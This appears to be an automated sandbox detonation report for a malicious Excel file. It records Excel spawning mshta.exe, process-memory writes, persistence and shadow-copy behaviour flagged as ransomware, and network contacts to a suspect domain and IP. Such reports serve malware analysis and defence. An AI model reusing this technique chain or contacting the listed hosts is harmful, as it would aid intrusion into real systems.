SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-13 03:03

Reported

2024-11-13 03:06

Platform

win10v2004-20241007-en

Max time kernel

143s

Max time network

139s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\ee6666aa9e5387583b1acb4e3684dfcb10c67d2fa6738b7ba07864b79976f2ed.xls"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\System32\mshta.exe C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4528 wrote to memory of 4236 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe
PID 4528 wrote to memory of 4236 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\ee6666aa9e5387583b1acb4e3684dfcb10c67d2fa6738b7ba07864b79976f2ed.xls"

C:\Windows\System32\mshta.exe

C:\Windows\System32\mshta.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 roaming.officeapps.live.com udp
FR 52.109.68.129:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 97.32.109.52.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 4t.gg udp
KR 221.146.204.133:443 4t.gg tcp
US 8.8.8.8:53 129.68.109.52.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 r10.o.lencr.org udp
GB 2.23.210.75:80 r10.o.lencr.org tcp
US 198.46.178.192:80 198.46.178.192 tcp
US 8.8.8.8:53 133.204.146.221.in-addr.arpa udp
US 8.8.8.8:53 32.169.19.2.in-addr.arpa udp
US 8.8.8.8:53 75.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 192.178.46.198.in-addr.arpa udp
US 8.8.8.8:53 27.73.42.20.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 75.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp

Files

memory/4528-0-0x00007FFED83B0000-0x00007FFED83C0000-memory.dmp

memory/4528-1-0x00007FFF183CD000-0x00007FFF183CE000-memory.dmp

memory/4528-3-0x00007FFED83B0000-0x00007FFED83C0000-memory.dmp

memory/4528-2-0x00007FFED83B0000-0x00007FFED83C0000-memory.dmp

memory/4528-5-0x00007FFED83B0000-0x00007FFED83C0000-memory.dmp

memory/4528-4-0x00007FFED83B0000-0x00007FFED83C0000-memory.dmp

memory/4528-7-0x00007FFF18330000-0x00007FFF18525000-memory.dmp

memory/4528-6-0x00007FFF18330000-0x00007FFF18525000-memory.dmp

memory/4528-8-0x00007FFF18330000-0x00007FFF18525000-memory.dmp

memory/4528-10-0x00007FFF18330000-0x00007FFF18525000-memory.dmp

memory/4528-11-0x00007FFF18330000-0x00007FFF18525000-memory.dmp

memory/4528-12-0x00007FFED5CA0000-0x00007FFED5CB0000-memory.dmp

memory/4528-9-0x00007FFF18330000-0x00007FFF18525000-memory.dmp

memory/4528-13-0x00007FFED5CA0000-0x00007FFED5CB0000-memory.dmp

memory/4528-14-0x00007FFF18330000-0x00007FFF18525000-memory.dmp

memory/4528-17-0x00007FFF18330000-0x00007FFF18525000-memory.dmp

memory/4528-18-0x00007FFF18330000-0x00007FFF18525000-memory.dmp

memory/4528-20-0x00007FFF18330000-0x00007FFF18525000-memory.dmp

memory/4528-19-0x00007FFF18330000-0x00007FFF18525000-memory.dmp

memory/4528-16-0x00007FFF18330000-0x00007FFF18525000-memory.dmp

memory/4528-15-0x00007FFF18330000-0x00007FFF18525000-memory.dmp

memory/4236-38-0x00007FFF18330000-0x00007FFF18525000-memory.dmp

memory/4236-42-0x00007FFF18330000-0x00007FFF18525000-memory.dmp

memory/4528-45-0x00007FFF18330000-0x00007FFF18525000-memory.dmp

memory/4528-46-0x00007FFF183CD000-0x00007FFF183CE000-memory.dmp

memory/4528-47-0x00007FFF18330000-0x00007FFF18525000-memory.dmp

memory/4236-51-0x00007FFF18330000-0x00007FFF18525000-memory.dmp

memory/4236-52-0x00007FF7321D0000-0x00007FF7321D8000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

MD5 1db43076453e25110d16a8013d558fe4
SHA1 20ad8372357cfa65ae3bcc38f448394c6c24d966
SHA256 3e973311136c5bbed135265e2facc151547b9424856a31698c2b9bfb73a571b5
SHA512 5e15a6d91c6a175cc92e5ceac2c98277df674aac82f7cdf1c6d9222f945044b00666bb1efd6485384efc1791bad09086f178baf76c7096d7cc9bb9b5df150355